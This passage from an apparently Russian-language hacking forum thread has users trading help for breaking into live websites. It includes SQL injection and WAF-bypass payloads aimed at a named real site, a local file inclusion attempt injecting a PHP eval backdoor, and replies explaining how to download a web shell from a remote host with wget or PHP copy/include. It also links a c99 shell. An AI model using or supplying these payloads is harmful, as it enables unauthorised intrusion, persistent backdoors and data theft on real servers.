ошибка на гл странице dle сайт Code: Deprecated: Function ereg() is deprecated in [PATH]/engine/modules/register.php on line 41 можно ли что то извлеч? или узнать версию? стоит нулл примерно версии середины лета 2009 года (точно хз не работал с dle)
WAF help please http://www.pampling.com/ficha_producto.php?id_producto=27%27+/*!union*/+select+1,2,3,4+--+
есть форум на vbulletin. На почту не приходит уведомление для реги,тобишь группы нереал посмотреть. Есть ли альтернативный способ, допустим узнать имя любой группы, либо создать её?
blind sql inj. Фильтруется union. Версия 4-я. Так что тут особо ловить нечего. Юзай проги типа хавиджа, они те и раскрутят скулю и попробуют подобрать по словарю имён таблиц и колонок. пример скули: Code: http://www.pampling.com/ficha_producto.php?id_producto=26+and+1=(select+if(ascii(substr(version(),1))=52,1,0))--+
SELECT IF(ASCII(SUBSTR(VERSION(),1,1))=53,1,0) MySQL 5 SELECT IF(ASCII(SUBSTR(VERSION(),1,1))=52,1,0) MySQL 4 I don't see difference at this page........can u help me?
file=../../../../../proc/self/environ выводит содержимое файла. через Tamper записываю PHP: <?php eval($_GET[e]); ?> пытаюсь подключить, file=../../../../../proc/self/environ&e=e=phpinfo(); просто выводит водержимое. Где-то сделал ошибку? Или есть обязательные условия для работы такой конструкции?
люди имею доступ к выполнению команд на сервере index.php?cmd=echo 123 а какой командой мне загрузить шелл подскажите плиз
люди имею доступ к выполнению команд на сервере index.php?cmd=echo 123 а какой командой мне загрузить шелл подскажите плиз КТО ПОДСКАЖЕТ ПОДЕЛЮСЬ ШЕЛЛОМ
посмотри стоит ли wget: index.php?cmd=whereis wget Если стоит, делай так: wget http://address/shell.txt -O /path/to/shell/shell.php з.ы. Папка в которую заливаешь шелл, должна быть открыта на запись. Посмотреть можешь так: index.php?cmd=ls -la
передай <?php phpinfo();?> в заголовке User-agent. Сделай так: 1. index.php?cmd=phpinfo(); если выведет результат команды phpinfo (ты это увидешь), то выполни такую команду index.php?cmd=copy($_GET,$_GET[o]);&s=ссылка_на_шелл&o=/tmp/sss.php и шелл скопируется в /tmp/sss.php дальше делаешь: index.php?cmd=include($_GET);&s=/tmp/sss.php 2. index.php?cmd=ls -la если выведется содержимое текущего каталога, то выполни index.php?cmd=wget -O sss.php ссылка_на_шелл шел скопируется в текущую диру, и потом просто открой sss.php Соответственно сработает если хватит прав на запись.
http://madnet.name/files/download/9_c99madshell.php p.s. Твой вопрос разжеван. Увижу еще один вопрос касающийся этого вопроса от тебя, посты все тру, тебя баню.
Posovetuite please web shell kotoriy rabotaet s Oracle bazoy. Est' webshell, mogy gryzit' faili, est' vsya infa dlya konnekta k oracle db. kak posmotret' kakie tam tablicy hotyabi? Iz etogo topika nechego rabotyeshego vrode ne nashel http://forum.antichat.ru/thread246807.html Spasibo
